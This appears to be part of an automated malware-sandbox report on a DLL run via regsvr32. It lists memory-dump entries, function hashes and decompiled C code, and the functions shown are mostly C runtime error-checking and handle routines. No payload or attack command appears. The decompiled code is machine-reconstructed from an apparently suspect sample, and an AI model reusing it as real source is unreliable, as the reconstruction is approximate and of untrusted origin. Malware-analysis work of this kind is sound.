                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_
                                                                                                                                            • String ID: (unsigned)(c + 1) <= 256$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isctype.c
                                                                                                                                            • API String ID: 1901436342-3621827421
                                                                                                                                            • Opcode ID: 582f87e7669c1111abee6c616077222c15a1b9b573b43815cbd7bd4630f6c99c
                                                                                                                                            • Instruction ID: b5912c41d7d1188a98adc98202f6074aedbe2cdee1b3907273593ffa0c6d8b3c
                                                                                                                                            • Opcode Fuzzy Hash: 582f87e7669c1111abee6c616077222c15a1b9b573b43815cbd7bd4630f6c99c
                                                                                                                                            • Instruction Fuzzy Hash: 89211B33A1CA55D6E750DF14E4816AEB7A0FB88B40F604835E78D83AA9DF3DD454CB50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: ("Invalid error_mode", 0)$_set_error_mode$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\errmode.c
                                                                                                                                            • API String ID: 2123368286-2972513288
                                                                                                                                            • Opcode ID: f8745b700fb78b44b2e658b57c518d69726f466f5def5af1cc34e5c73236fe3e
                                                                                                                                            • Instruction ID: e7988b679b9ddcb00c5f6bb8249f14d211ab82686a28cff9569e0831723c594e
                                                                                                                                            • Opcode Fuzzy Hash: f8745b700fb78b44b2e658b57c518d69726f466f5def5af1cc34e5c73236fe3e
                                                                                                                                            • Instruction Fuzzy Hash: 95216F31D1D26ADAE7A48F14EA4477A73A0FB44B58F701835E54E826E4DF7CE844CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$string != NULL && sizeInBytes > 0
                                                                                                                                            • API String ID: 2123368286-367560414
                                                                                                                                            • Opcode ID: b10b6c40919f833f94f1f9af6a6d465dd1a232ebc9f5396bdae7492d99103452
                                                                                                                                            • Instruction ID: 4dcea5a1a5c399f84c91b0ecabf27a04efd384ef035920fa556531ea77c44627
                                                                                                                                            • Opcode Fuzzy Hash: b10b6c40919f833f94f1f9af6a6d465dd1a232ebc9f5396bdae7492d99103452
                                                                                                                                            • Instruction Fuzzy Hash: F3117C31D0C66ED9F7788F10E9553B962A0EB94B48FA05835E25C42AE5CF7DE488CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$pwcs != NULL
                                                                                                                                            • API String ID: 2123368286-2992382544
                                                                                                                                            • Opcode ID: 4e01e6c780b0bcb150885d639f6c4af62c750d2377cec983ef0e9e7992ea6864
                                                                                                                                            • Instruction ID: d69c7fbdfdd7cf583dc7aaf9b39e221881bb04036cd35459985a83742b9cd180
                                                                                                                                            • Opcode Fuzzy Hash: 4e01e6c780b0bcb150885d639f6c4af62c750d2377cec983ef0e9e7992ea6864
                                                                                                                                            • Instruction Fuzzy Hash: 84115B3190C6AAE5E6748F24E5443FA6291BB88B14FA04A35C19D866D5CF3ED184CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                                                                                                            • API String ID: 2123368286-152112980
                                                                                                                                            • Opcode ID: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                                                                                                            • Instruction ID: 94af1313ab584a1022c18cb2b93bc6f10a4f1fd3bc4066b501806100f93a5091
                                                                                                                                            • Opcode Fuzzy Hash: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                                                                                                            • Instruction Fuzzy Hash: 2A11F87190C66AE5F7389F50E6043AA77A1EB44B44F604835D64C466E5CF7DE888CB21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: (stream != NULL)$_fileno$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fileno.c
                                                                                                                                            • API String ID: 2123368286-3532421942
                                                                                                                                            • Opcode ID: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                                                                                                            • Instruction ID: 87d9f6bc92853fc63745493c02f3b0cb32a4f5374fb9e095c9afe4863f2fb14d
                                                                                                                                            • Opcode Fuzzy Hash: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                                                                                                            • Instruction Fuzzy Hash: A2115A71A1C66ADAE7648F10E64476AB3A1FB84B08F602935F69D43AD4CF7CD448CB21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _unlock$CurrentThreadValue_calloc_dbg_calloc_dbg_impl
                                                                                                                                            • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dllcrt0.c
                                                                                                                                            • API String ID: 433497747-929597301
                                                                                                                                            • Opcode ID: 4a193bd2c8a37f88eb93531062afc5f9393ecf856dfe2553b23811d9331ecddf
                                                                                                                                            • Instruction ID: fcc975236ca5ad33d73d99efd1c4c35dafe4012ef372c91632f9feb6eaae992d
                                                                                                                                            • Opcode Fuzzy Hash: 4a193bd2c8a37f88eb93531062afc5f9393ecf856dfe2553b23811d9331ecddf
                                                                                                                                            • Instruction Fuzzy Hash: 07015E22A2C66AE2E750DF25E44473A6260FFC8F50F705A31E99E426D5CE2EE400C621
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: (count == 0) || (string != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                                                                            • API String ID: 2123368286-3131718208
                                                                                                                                            • Opcode ID: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                                                                                                            • Instruction ID: 0edfa92a46b38d2d4a6b29e03c35528088d6235c0f9b383c395b492e29dcf8b7
                                                                                                                                            • Opcode Fuzzy Hash: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                                                                                                            • Instruction Fuzzy Hash: 38115B7190D66ADAF7248F24EA1436A6290FB44B08F704A35D6AC036E5DF7DE588CF21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: (format != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                                                                            • API String ID: 2123368286-1927795013
                                                                                                                                            • Opcode ID: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                                                                                                            • Instruction ID: 85767c342b6a26ee468d951d9dda0d7be18b10fb734d1fdd25fb5dad2ed07ed8
                                                                                                                                            • Opcode Fuzzy Hash: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                                                                                                            • Instruction Fuzzy Hash: C1014C32E0C66AD6F7248F64F9003A66690BB44B48F700A31E65C036E5DF7CE585CB21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: _msize_dbg$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pUserData != NULL
                                                                                                                                            • API String ID: 2123368286-563024394
                                                                                                                                            • Opcode ID: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                                                                                                            • Instruction ID: 0cc622727de8b971de7a3093f681d6c8058801363d3a60ccddead352ac2abc90
                                                                                                                                            • Opcode Fuzzy Hash: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                                                                                                            • Instruction Fuzzy Hash: C3014C3290C62AD6E6209F21E94037622A0BF4AB28FB04A35D25C466C4DF7FD545CB60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL
                                                                                                                                            • API String ID: 2123368286-577066449
                                                                                                                                            • Opcode ID: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                                                                                                            • Instruction ID: 825db4225b4ff5dbcd444d88a36965662da8774153f3c8cb17ca528deb1e6a2e
                                                                                                                                            • Opcode Fuzzy Hash: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                                                                                                            • Instruction Fuzzy Hash: A001713190C66ED6F7689F10EA403A96760EB44B58FB01935E69D436E8CF3DE544CB60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                            • API String ID: 1646373207-1276376045
                                                                                                                                            • Opcode ID: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                                                                                                            • Instruction ID: afa242893ab16ce952514e54140ea47573cdcdaa3a0f4c25df4129235af71e82
                                                                                                                                            • Opcode Fuzzy Hash: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                                                                                                            • Instruction Fuzzy Hash: 20F01C3290CA56C2D734DF10F9483297BB0FB88B48F600934D68E426B4CF3CD688CA14
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 41%
                                                                                                                                            			E00007FFC7FFC65D10C80(signed int __ecx, void* __eflags, void* __rax, void* __r8, signed int _a8) {
                                                                                                                                            				signed long long _v16;
                                                                                                                                            				long _v24;
                                                                                                                                            				void* _t57;
                                                                                                                                            				signed long long _t59;
                                                                                                                                            
                                                                                                                                            				_t57 = __rax;
                                                                                                                                            				_a8 = __ecx;
                                                                                                                                            				E00007FFC7FFC65D0F900(_a8);
                                                                                                                                            				if (_t57 == 0xffffffff) goto 0x65d10d05;
                                                                                                                                            				if (_a8 != 1) goto 0x65d10cb3;
                                                                                                                                            				if (( *( *0x65d1e560 + 0xb8) & 0x00000001) != 0) goto 0x65d10ccc;
                                                                                                                                            				if (_a8 != 2) goto 0x65d10cef;
                                                                                                                                            				_t59 =  *0x65d1e560;
                                                                                                                                            				if (( *(_t59 + 0x60) & 0x00000001) == 0) goto 0x65d10cef;
                                                                                                                                            				E00007FFC7FFC65D0F900(1);
                                                                                                                                            				_v16 = _t59;
                                                                                                                                            				E00007FFC7FFC65D0F900(2);
                                                                                                                                            				if (_v16 == _t59) goto 0x65d10d05;
                                                                                                                                            				E00007FFC7FFC65D0F900(_a8);
                                                                                                                                            				if (CloseHandle(??) == 0) goto 0x65d10d0f;
                                                                                                                                            				_v24 = 0;
                                                                                                                                            				goto 0x65d10d19;
                                                                                                                                            				_v24 = GetLastError();
                                                                                                                                            				E00007FFC7FFC65D0F7D0(_a8, _t59);
                                                                                                                                            				 *((char*)( *((intOrPtr*)(0x65d1e560 + _t59 * 8)) + 8 + (_a8 & 0x0000001f) * 0x58)) = 0;
                                                                                                                                            				if (_v24 == 0) goto 0x65d10d60;
                                                                                                                                            				E00007FFC7FFC65CFAA70(_v24,  *((intOrPtr*)(0x65d1e560 + _t59 * 8)));
                                                                                                                                            				goto 0x65d10d62;
                                                                                                                                            				return 0;
                                                                                                                                            			}







                                                                                                                                            0x7ffc65d10c80
                                                                                                                                            0x7ffc65d10c80
                                                                                                                                            0x7ffc65d10c8c
                                                                                                                                            0x7ffc65d10c95
                                                                                                                                            0x7ffc65d10c9c
                                                                                                                                            0x7ffc65d10cb1
                                                                                                                                            0x7ffc65d10cb8
                                                                                                                                            0x7ffc65d10cba
                                                                                                                                            0x7ffc65d10cca
                                                                                                                                            0x7ffc65d10cd1
                                                                                                                                            0x7ffc65d10cd6
                                                                                                                                            0x7ffc65d10ce0
                                                                                                                                            0x7ffc65d10ced
                                                                                                                                            0x7ffc65d10cf3
                                                                                                                                            0x7ffc65d10d03
                                                                                                                                            0x7ffc65d10d05
                                                                                                                                            0x7ffc65d10d0d
                                                                                                                                            0x7ffc65d10d15
                                                                                                                                            0x7ffc65d10d1d
                                                                                                                                            0x7ffc65d10d44
                                                                                                                                            0x7ffc65d10d4e
                                                                                                                                            0x7ffc65d10d54
                                                                                                                                            0x7ffc65d10d5e
                                                                                                                                            0x7ffc65d10d66

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseErrorHandleLast__doserrno_dosmaperr_free_osfhnd
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1551955814-0
                                                                                                                                            • Opcode ID: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                                                                                                            • Instruction ID: 2db228a680ff043f577372baaadea259f4832655fe7d5185a8df7f262710ca55
                                                                                                                                            • Opcode Fuzzy Hash: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                                                                                                            • Instruction Fuzzy Hash: 6A21853590C65AC7E638AB10E64033E76A1FB85B94F304635D65D46BE5DF2CE851CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FormatLocaleThread$DateTime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3587784874-0
                                                                                                                                            • Opcode ID: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                                                                                                            • Instruction ID: e3d21aa97fd6da6e29ce11718fa505d3ebdb3b6dd9c84d5e8c8e8efbca6e7b19
                                                                                                                                            • Opcode Fuzzy Hash: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                                                                                                            • Instruction Fuzzy Hash: 3211C172608785C6E3208F75F94015AB7A0FB49BE4F648B34EA9D47B98CE3DD141C700
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 35%
                                                                                                                                            			E00007FFC7FFC65D04960(void* __ecx, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int _a40, intOrPtr _a48, long long _a56, long long _a64) {
                                                                                                                                            				long long _v24;
                                                                                                                                            				long long _v32;
                                                                                                                                            				long long _v40;
                                                                                                                                            				long long _v48;
                                                                                                                                            				long long _v56;
                                                                                                                                            				char _v60;
                                                                                                                                            				char _v64;
                                                                                                                                            				signed int _v72;
                                                                                                                                            				char _v80;
                                                                                                                                            				char _v88;
                                                                                                                                            				long long _v96;
                                                                                                                                            				intOrPtr _v104;
                                                                                                                                            				long long _v112;
                                                                                                                                            				long long _v120;
                                                                                                                                            				long long _v128;
                                                                                                                                            				signed int _v136;
                                                                                                                                            				void* _t106;
                                                                                                                                            				void* _t117;
                                                                                                                                            				void* _t118;
                                                                                                                                            				void* _t119;
                                                                                                                                            				void* _t120;
                                                                                                                                            				void* _t121;
                                                                                                                                            				long long _t153;
                                                                                                                                            				signed int _t161;
                                                                                                                                            				signed int _t165;
                                                                                                                                            				long long _t166;
                                                                                                                                            				long long _t169;
                                                                                                                                            				long long _t170;
                                                                                                                                            				intOrPtr _t174;
                                                                                                                                            
                                                                                                                                            				_a32 = __r9;
                                                                                                                                            				_a24 = __r8;
                                                                                                                                            				_a16 = __rdx;
                                                                                                                                            				_a8 = __rcx;
                                                                                                                                            				_t153 = _a8;
                                                                                                                                            				if ( *_t153 != 0x80000003) goto 0x65d04990;
                                                                                                                                            				goto 0x65d04cc6;
                                                                                                                                            				0x65cf4000();
                                                                                                                                            				if ( *((long long*)(_t153 + 0xe0)) == 0) goto 0x65d04a33;
                                                                                                                                            				0x65cf4000();
                                                                                                                                            				_v56 = _t153;
                                                                                                                                            				E00007FFC7FFC65CF3D00(_t106);
                                                                                                                                            				if ( *((intOrPtr*)(_v56 + 0xe0)) == _t153) goto 0x65d04a33;
                                                                                                                                            				if ( *_a8 == 0xe0434f4d) goto 0x65d04a33;
                                                                                                                                            				if ( *_a8 == 0xe0434352) goto 0x65d04a33;
                                                                                                                                            				_v120 = _a64;
                                                                                                                                            				_v128 = _a56;
                                                                                                                                            				_v136 = _a40;
                                                                                                                                            				if (E00007FFC7FFC65CFE9B0(_a8, _a16, _a24, _a32) == 0) goto 0x65d04a33;
                                                                                                                                            				goto 0x65d04cc6;
                                                                                                                                            				if ( *((intOrPtr*)(_a40 + 0xc)) == 0) goto 0x65d04a43;
                                                                                                                                            				goto 0x65d04a48;
                                                                                                                                            				E00007FFC7FFC65CFCF80(_a40);
                                                                                                                                            				_v120 = _a32;
                                                                                                                                            				_v128 =  &_v60;
